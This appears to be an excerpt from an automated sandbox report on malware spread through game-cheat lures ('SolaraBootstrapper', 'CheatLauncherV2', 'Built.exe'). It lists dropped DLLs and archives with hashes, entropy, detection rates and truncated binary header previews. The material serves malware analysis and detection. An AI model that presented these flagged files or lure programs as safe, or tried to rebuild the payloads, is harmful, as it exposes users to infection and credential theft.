                                                  SHA-256:6F6DE861D4ADD275621FF52ED1695F691EFD7ED742D4B077CE43EB96F2C5CFBA
                                                  SHA-512:4905829EBB3EEE6F7B2F6B4B97E20510F7565DD64F224E3AFBD826C62C33A57229E15349B463E9AE1B47B8BFCDD9C58F047A15488DD00FB8C702E6F4FB64CD4A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2.F.S...S...S...+\..S..P....S..P....S..P....S..P....S...+...S...*...S...S..MS..a....S...*...S...*0..S...*...S..Rich.S..........................PE..d....VIf.........." .....H...D......8+....................................................`..................................................................p...A..............4....{.......................|..(....z..@............`..h............................text.../F.......H.................. ..`.rdata.......`.......L..............@..@.data....#...@.......$..............@....pdata...A...p...B...B..............@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):535040
                                                  Entropy (8bit):6.393831638925329
                                                  Encrypted:false
                                                  SSDEEP:12288:InAnSwPc/1BzyLmI2MB1MqcUfCKHU1XAfK6ae:I6Pc/1BOKtaeqcUaZXm
                                                  MD5:E31F5136D91BAD0FCBCE053AAC798A30
                                                  SHA1:EE785D2546AEC4803BCAE08CDEBFD5D168C42337
                                                  SHA-256:EE94E2201870536522047E6D7FE7B903A63CD2E13E20C8FFFC86D0E95361E671
                                                  SHA-512:A1543EB1D10D25EFB44F9EAA0673C82BFAC5173055D04C0F3BE4792984635A7C774DF57A8E289F840627754A4E595B855D299070D469E0F1E637C3F35274ABE6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{-..?LtU?LtU?LtU64.U-LtU_6uT=LtU_6.U7LtU_6qT2LtU_6pT7LtU_6wT;LtU[6uT=LtU?LuU.LtUt4uT4LtU[6pT.LtU[6tT>LtU[6.U>LtU?L.U>LtU[6vT>LtURich?LtU........PE..d...._.e.........." ... ............0........................................`............`....................................................T....@...........K...........P..x... F..T............................D..@............0..p............................text............................... ..`.rdata.."....0......................@..@.data...(/.......&..................@....pdata...K.......L..................@..@.rsrc........@......................@..@.reloc..x....P....... ..............@..B................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):590112
                                                  Entropy (8bit):6.461915792957004
                                                  Encrypted:false
                                                  SSDEEP:12288:RI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRvbQEKZm+jWodEEVhQ:RD89rxZCQEKZm+jWodEEPQ
                                                  MD5:7B92A6CB5D2CAD407C457AB12D2B211D
                                                  SHA1:E04020B3448FC6084FA31B7F791F22FF15E31328
                                                  SHA-256:3C6A772319FFF3EE56D4CEDBE332BB5C0C2F394714CF473C6CDF933754114784
                                                  SHA-512:B28740C1ACA4F0F60A9E4A9AB5A0561AF774D977AB6D42A7EEA70C9E560C77C50BE5D9D869F05D0435E2923F4F600219335D22425807AB23CBBCDA75442C4B42
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d....).^.........." .....@..........."...............................................&....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):101664
                                                  Entropy (8bit):6.571798459921823
                                                  Encrypted:false
                                                  SSDEEP:1536:sC6b39cL/iRDhXq4GZLAy10i5XNC83tTPw98APXbxecbSQ25I4I/Cq:sVPphXq30yvXL5APbxecbSDu
                                                  MD5:7A2B8CFCD543F6E4EBCA43162B67D610
                                                  SHA1:C1C45A326249BF0CCD2BE2FBD412F1A62FB67024
                                                  SHA-256:7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
                                                  SHA-512:E38304FB9C5AF855C1134F542ADF72CDE159FAB64385533EAFA5BB6E374F19B5A29C0CB5516FC5DA5C0B5AC47C2F6420792E0AC8DDFF11E749832A7B7F3EB5C8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d....Y._.........." .........^......p.....................................................`A........................................`1..4....9.......p.......P.......L.. A..........H...T...............................0............................................text............................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):426688
                                                  Entropy (8bit):6.149945537615476
                                                  Encrypted:false
                                                  SSDEEP:6144:0LYcepnIinzqyUMCLJ16iYRrKWr3GIIGepi6/GDQez5NzLJpyM7BVl7+jBSEYdRU:5d+iiYxKdns6+Dl5NpdqmU
                                                  MD5:F1FAFC04216614EC5C7B8C6A82394DFD
                                                  SHA1:5B6966D9AF7BCF687AAB982C26EFE1C2ADFAFF18
                                                  SHA-256:7E412388C871F5F1D1651DA11689EB82A7E4C5785409EC2753CFC4BE484D910E
                                                  SHA-512:0828267F5036B105982B2FC351C1C40D06AE4853ACE76F131DC44D8DEC0F9281B4FECAB52CE273E2D9DE06B95B8CE47AF093689B9F9304DE3577D47A3853F599
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z!U..O...O...O..pN...O..pL...O..pK...O..c....O...N.I.O..pO...O..pB...O..p....O..pM...O.Rich..O.................PE..d......I.........." .....4...$.......C...................................................`A........................................@...X....................0...0...R...0......P....p..T............................P..............@Z......d........................text............................... ..`.wpp_sf.2/... ...0.................. ..`.rdata.......P.......8..............@..@.data........ ......................@....pdata...0...0...2..................@..@.didat.......p.......:..............@....rsrc................<..............@..@.reloc..P............P..............@..B................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):116428
                                                  Entropy (8bit):6.4010071863984805
                                                  Encrypted:false
                                                  SSDEEP:3072:wsuxy/bjdeT1dtDCV8SSsfj7cTpHTBfQjxcHE2Fl:wsZ/bRe5PDCV8SLfcFTBIjxyE2Fl
                                                  MD5:75365924730B0B2C1A6EE9028EF07685
                                                  SHA1:A10687C37DEB2CE5422140B541A64AC15534250F
                                                  SHA-256:945E7F5D09938B7769A4E68F4EF01406E5AF9F40DB952CBA05DDB3431DD1911B
                                                  SHA-512:C1E31C18903E657203AE847C9AF601B1EB38EFA95CB5FA7C1B75F84A2CBA9023D08F1315C9BB2D59B53256DFDB3BAC89930252138475491B21749471ADC129A1
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........1.....&"...#.6..........P..........A.............................@.......Y....`... ..............................................................................0.................................(.......................h............................text....5.......6..................`.P`.data........P.......:..............@.P..rdata..@U...`...V...<..............@.`@.pdata..............................@.0@.xdata..h...........................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....X...........................@.@..tls......... ......................@.@..reloc.......0......................@.0B........................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):13737409
                                                  Entropy (8bit):7.99779964213994
                                                  Encrypted:true
                                                  SSDEEP:196608:qd7sj/MLLbcCXaXEFZB5AwuBFqqdsz6s6n533xjnBKGewxVeA4bLljlNVhtGcLcO:qa/CLKEgFj+TwIWgnJJNV/GybGG
                                                  MD5:2ED9D06DC92074DB77AB806C7DC3B7D5
                                                  SHA1:2A39C1B8D4C79385F7D920D12546FF2F2F23C5F6
                                                  SHA-256:373BA2A70E547B87051047D6DAB7FC941BF4183FF4ED7999223ED3E069807A72
                                                  SHA-512:91F415D2B792F473A71A3B346F891525494A6C0ABD4116FA9CC4C7832A7A273212847C37BCA37146E917276BA26FDBF194AB4718873C36D6F83967AA25E8CD75
                                                  Malicious:false
                                                  Preview:PK........XR.X.4.c.+..(`..,...Solara.Dir/api-ms-win-crt-convert-l1-1-0.dll.y|L....,Id...D.Db7..l%d..I$.T..df.....%.....N....ZZJ.ZCi..=..UK.E.v...;..o......^......9.9.Y.s...G8...x....D.........d.......9%r..L.*V.Ky..R....e<.N.+y...R.T...[.......|....).-h.....t.|}...g.%%t=[_2........J..>..sg{.d..-*{3.*.1.&..a.X.L..,..h.~.L....z.".n+..P..cQ.'.G....r........bB.[..Cm..u....!j.ZB..Q.:.sd.G.{.............z....~.....:..7.......^5..d.g.....+..gO\&.j..r%_...%*e...B...2i...o}_.M...T..0a.............G3...)...h..qL2!qp...-!....D.m..!- ..KH...*.|....WA3h...H.c....|...K.1..s..$.......=.'p.p:....A.P.9`.8..~...C.....@#..\;....|....Z./p.....@...*P....s'B..A@.....[p.<.-:..0....0.|.....9p.p....".0..5`%..\././..>H...x0.....y....b}..0....6p....... ...*0...;.)p.t.:..9`.....7.g..xa.{..P.&...s.......XC....@.....k....+..k.........{p..... .H@5....`.;.7.0..S........_.g4..:..|..g..k....I`9h.'.-@.~.@...R0.,...~....^..XG>H....X.....}..5..b@......`'8...w.c0....$..l...e...`.C.PP
                                                  Process:C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe
                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):13312
                                                  Entropy (8bit):4.677524556734161
                                                  Encrypted:false
                                                  SSDEEP:192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
                                                  MD5:6557BD5240397F026E675AFB78544A26
                                                  SHA1:839E683BF68703D373B6EAC246F19386BB181713
                                                  SHA-256:A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
                                                  SHA-512:F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..*...........I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..*6..(.........*....0...........(....o......rS..p(.........+8...........o..........
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.133660689688185
                                                  Encrypted:false
                                                  SSDEEP:3:t0nSQz4XN:t0jcd
                                                  MD5:83DA81DF2AF943B2EC711ADA9708399D
                                                  SHA1:4C505B990E9374F9797B3450B0D9CF39D822704E
                                                  SHA-256:74BD2DDEE990E1C8DBCD9A96025BA1D60F791B74705749F78A755280B4B33DEE
                                                  SHA-512:291737DFE07564BA770D7E65A6803DF15E73BA40EBA4926A4F475EEF3F5F6072DFC4D8CB6953B5EF57802758BC8BC9EC79316A66037A144008D8537965D3660B
                                                  Malicious:false
                                                  Preview:RzcgJzk6dzCN7Ga75b6JFa8rh
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):119192
                                                  Entropy (8bit):6.6016214745004635
                                                  Encrypted:false
                                                  SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                  MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                  SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                  SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                  SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):49944
                                                  Entropy (8bit):7.787272734180523
                                                  Encrypted:false
                                                  SSDEEP:768:MXjTDOU1Mkw8KBJ7QlIRZcz63VPzH8y5GNexMpO/IjCVD0P5YiSyvEAMxkE4s:GnO7kwXBJ78OZENkB/IjCVDc7SyqxJ
                                                  MD5:980EFF7E635AD373ECC39885A03FBDC3
                                                  SHA1:9A3E9B13B6F32B207B065F5FCF140AECFD11B691
                                                  SHA-256:B4411706AFC8B40A25E638A59FE1789FA87E1CE54109BA7B5BD84C09C86804E1
                                                  SHA-512:241F9D3E25E219C7B9D12784AB525AB5DED58CA623BC950027B271C8DFB7C19E13536F0CAF937702F767413A6D775BED41B06902B778E4BAD2946917E16AD4EF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d....K.f.........." ...&.............t....................................................`.............................................H....................0..8.....................................................@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):60696
                                                  Entropy (8bit):7.826186640993217
                                                  Encrypted:false
                                                  SSDEEP:1536:dQm2JyhT7X84MYNbLlJRiQFM+pIWHIjLPj+7SyANx4:dQ9JyhT7nHnjFXeiIjLPj+6U
                                                  MD5:A8CB7698A8282DEFD6143536ED821EC9
                                                  SHA1:3D1B476B9C042D066DE16308D99F1633393A497A
                                                  SHA-256:40D53A382A78B305064A4F4DF50543D2227679313030C9EDF5EE82AF23BF8F4A
                                                  SHA-512:1445AE7DC7146AFBE391E131BAFF456445D7E96A3618BFEF36DC39AF978DD305E3A294ACD62EE91A050812C321A9EC298085C7AD4EB9B81E2E40E23C5A85F2CC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&e..b..b..b..k|H.d..d..`..d..n..d..j..d..f.....`..)|.c..)|.d...x.a..b........d.....c....$.c.....c..Richb..................PE..d....K.f.........." ...&............P-.......................................P............`.........................................HL.......I.......@.......................L......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):107800
                                                  Entropy (8bit):7.9398737446938865
                                                  Encrypted:false
                                                  SSDEEP:3072:drlajXG60D6JCd/WQG+nA1kR6rLlG/iIjOql7ph:dsC60D6Y/WKAEggD7n
                                                  MD5:CCFAD3C08B9887E6CEA26DDCA2B90B73
                                                  SHA1:0E0FB641B386D57F87E69457FAF22DA259556A0D
                                                  SHA-256:BAD3948151D79B16776DB9A4A054033A6F2865CB065F53A623434C6B5C9F4AAD
                                                  SHA-512:3AF88779DB58DCAE4474C313B7D55F181F0678C24C16240E3B03721B18B66BDFB4E18D73A3CEF0C954D0B8E671CF667FC5E91B5F1027DE489A7039B39542B8CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...yK.f.........." ...&.p................................................... ............`.............................................P.......................`'......................................................@...........................................UPX0....................................UPX1.....p.......d..................@....rsrc................h..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36632
                                                  Entropy (8bit):7.660102821783565
                                                  Encrypted:false
                                                  SSDEEP:768:u665W8yKNUYvmiOhWzYda7jeWMl9pcgvIjOIOL5YiSyveAMxkEQ:TXg6iLYosugvIjOIO17Sy0xs
                                                  MD5:89F3C173F4CA120D643AAB73980ADE66
                                                  SHA1:E4038384B64985A978A6E53142324A7498285EC4
                                                  SHA-256:95B1F5EFF9D29EB6E7C6ED817A12CA33B67C76ACEA3CB4F677EC1E6812B28B67
                                                  SHA-512:76E737552BE1CE21B92FA291777EAC2667F2CFC61AE5EB62D133C89B769A8D4EF8082384B5C819404B89A698FCC1491C62493CF8FF0DCC65E01F96B6F7B5E14F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.A:...:...:...3ca.>...<...8...<...6...<...2...<...9...U...8...qc..8.......9...:.......U...;...U...;...U...;...U...;...Rich:...........................PE..d....K.f.........." ...&.P..........@!.......................................@............`.........................................|;..P....9.......0.......................;......................................@-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):88344
                                                  Entropy (8bit):7.9217264947224155
                                                  Encrypted:false
                                                  SSDEEP:1536:Ak3ep7MJoKbCKmzzYu0RgKYtpreDVERxzTykTwTGcIjZ14S7SyWxq:NeRgFWKNZRZCeDVEz81IjZ14Sv
                                                  MD5:05ADB189D4CFDCACB799178081D8EBCB
                                                  SHA1:657382AD2C02B42499E399BFB7BE4706343CECAB
                                                  SHA-256:87B7BAE6B4F22D7D161AEFAE54BC523D9C976EA2AEF17EE9C3CF8FE958487618
                                                  SHA-512:13FC9204D6F16A6B815ADDF95C31EA5C543BF8608BFCC5D222C7075DD789551A202AE442FDDC92EA5919ECF58BA91383A0F499182B330B98B240152E3AA868C5
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MRu.MRu.MRu.D*..IRu.K.t.ORu.K.p.ARu.K.q.ERu.K.v.NRu.".t.NRu..*t.ORu.MRt.(Ru.".x.wRu.".u.LRu."..LRu.".w.LRu.RichMRu.........................PE..d....K.f.........." ...&. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26904
                                                  Entropy (8bit):7.414292519859785
                                                  Encrypted:false
                                                  SSDEEP:384:F6I92F0lWEJlgaSrBdgZc8PI8rZa7gJXi+IjQUONSHQIYiSy1pCQy1SAM+o/8E9o:+AvSrBFgpS+IjQUOG5YiSyvwSAMxkEBo
                                                  MD5:FC796FCDE996F78225A4EC1BED603606
                                                  SHA1:5389F530AAF4BD0D4FCE981F57F68A67FE921EE1
                                                  SHA-256:C7C598121B1D82EB710425C0DC1FC0598545A61FFB1DD41931BB9368FB350B93
                                                  SHA-512:4D40E5A4AB266646BEDACF4FDE9674A14795DCFB72AAE70A1C4C749F7A9A4F6E302A00753FE0446C1D7CC90CAEE2D37611D398FDC4C68E48C8BC3637DFD57C15
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\.~...~...~.......~.......~.......~.......~.......~.......~.......~...~...~.......~.......~....}..~.......~..Rich.~..................PE..d....K.f.........." ...&.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):45336
                                                  Entropy (8bit):7.7154595033515205
                                                  Encrypted:false
                                                  SSDEEP:768:P3lDDHqvff0W1WMxvs0xeAlFWJpQT0IjLwDBR5YiSyvyAMxkEo:P3lDKfns0P9T0IjLwDBf7Sy4xU
                                                  MD5:F8D03997E7EFCDD28A351B6F35B429A2
                                                  SHA1:1A7AE96F258547A14F6E8C0DEFE127A4E445206D
                                                  SHA-256:AEF190652D8466C0455311F320248764ACBFF6109D1238A26F8983CE86483BF1
                                                  SHA-512:40C9BCE421C7733DF37558F48B8A95831CC3CF3E2C2CDF40477B733B14BD0A8A0202BC8BC95F39FCD2F76D21DEAC21AD1A4D0F6218B8F8D57290968163EFFEF8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.i....}...}...}..}...}.0.|...}.0.|...}.0.|...}.0.|...}o0.|...}...}...}K..|...}o0.|...}o0.|...}o0.}...}o0.|...}Rich...}........PE..d....K.f.........." ...&.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):59160
                                                  Entropy (8bit):7.838571808927336
                                                  Encrypted:false
                                                  SSDEEP:1536:gXwJUS8MhCTn+6CEO3k/BSJIjOQzZ7SycxdN:g0UKDv3kqIjOQzZU
                                                  MD5:3D85E2AA598468D9449689A89816395E
                                                  SHA1:E6D01B535C8FC43337F3C56BFC0678A64CF89151
                                                  SHA-256:6F0C212CB7863099A7CE566A5CF83880D91E38A164DD7F9D05D83CCE80FA1083
                                                  SHA-512:A9A527FC1FCCE3FFE95E9E6F4991B1A7156A5CA35181100EA2A25B42838B91E39DD9F06F0EFEDB2453AA87F90E134467A7662DBBE22C6771F1204D82CC6CEA82
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~..~..~...P..~.....~...>..~.....~.....~......~.....~.....~..~........~.....~...<..~......~.Rich.~.........PE..d....K.f.........." ...&.........p...........................................@............`..........................................;..P....9.......0..........h............;.......................................%..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):67352
                                                  Entropy (8bit):7.864633161053976
                                                  Encrypted:false
                                                  SSDEEP:1536:1zWUwgWT4zVJqpgI36lYp3rf4prHoStjjdIjC7I9x7SytqxcV+9:d9JUgC6lgrQvjxIjC7IzVVK
                                                  MD5:615BFC3800CF4080BC6D52AC091EC925
                                                  SHA1:5B661997ED1F0A6EA22640B11AF71E0655522A10
                                                  SHA-256:1819DD90E26AA49EB40119B6442E0E60EC95D3025E9C863778DCC6295A2B561F
                                                  SHA-512:1198426B560044C7F58B1A366A9F8AFCDE1B6E45647F9AE9C451FB121708AA4371673815BE1D35AD1015029C7C1C6EA4755EB3701DBF6F3F65078A18A1DAEACB
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&h^.G...G...G...?...G.......G.......G.......G.......G.......G.......G...G..eF...?...G.......G.......G.......G.......G..Rich.G..................PE..d....K.f.........." ...&.........@.......P...................................0............`.........................................l,..d....)....... ..........P............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):1333651
                                                  Entropy (8bit):5.5868779115750264
                                                  Encrypted:false
                                                  SSDEEP:12288:uttcY+bS4OmE1jc+fYNXPh26UZWAzDX7jOIqL3CjHgopRdmoPFHz1dcfsFvaYcIe:uttcY+NHSPD/e2cqRdmoPxzQIaYcIe
                                                  MD5:8DAD91ADD129DCA41DD17A332A64D593
                                                  SHA1:70A4EC5A17ED63CAF2407BD76DC116ACA7765C0D
                                                  SHA-256:8DE4F013BFECB9431AABAA97BB084FB7DE127B365B9478D6F7610959BF0D2783
                                                  SHA-512:2163414BC01FC30D47D1DE763A8332AFE96EA7B296665B1A0840D5197B7E56F4963938E69DE35CD2BF89158E5E2240A1650D00D86634AC2A5E2AD825455A2D50
                                                  Malicious:false
                                                  Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):118299
                                                  Entropy (8bit):7.698988090252962
                                                  Encrypted:false
                                                  SSDEEP:3072:B6+U5EnMK13/uEbKF6MzoHP/MtNLEndPfP:HU53ebKBtw1fP
                                                  MD5:5D5AC02B4EDE50180EC2C99893813DB7
                                                  SHA1:59C28FFBBBF0832F77E647CEE93F8032441DABA5
                                                  SHA-256:AF899B23036DBDDD4E89E81E3D5637AA8325FF544C9C39ADB4065385B54809B5
                                                  SHA-512:E701D6444A1392A0FB6B5E40580CAC5D335E952BF5E4DE117BD99D5086CF17B9FD4C1E6F5608F219D0991BC39D33DBC66A4D5C35CC7C19CC8AD13D542E9960FE
                                                  Malicious:false
